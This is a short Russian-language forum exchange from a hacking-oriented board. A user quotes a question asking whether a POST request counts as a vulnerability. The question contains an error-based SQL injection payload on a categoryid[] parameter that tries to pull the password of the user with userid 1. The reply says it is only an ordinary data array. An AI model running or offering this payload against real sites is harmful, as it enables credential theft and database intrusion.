20.01.2016, 03:37
|
|
Познающий
Регистрация: 08.01.2016
Сообщений: 33
С нами:
5445686
Репутация:
0
|
|
Сообщение от Sensoft
↑
Ребят помогите пожалуйста
Считается это уязвимостью ?
Я отправил пост запрос с таким кодом
Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это
Нет, обычный массив данных. Могу предположить передается яваскриптом при отправке формы.
|
|
|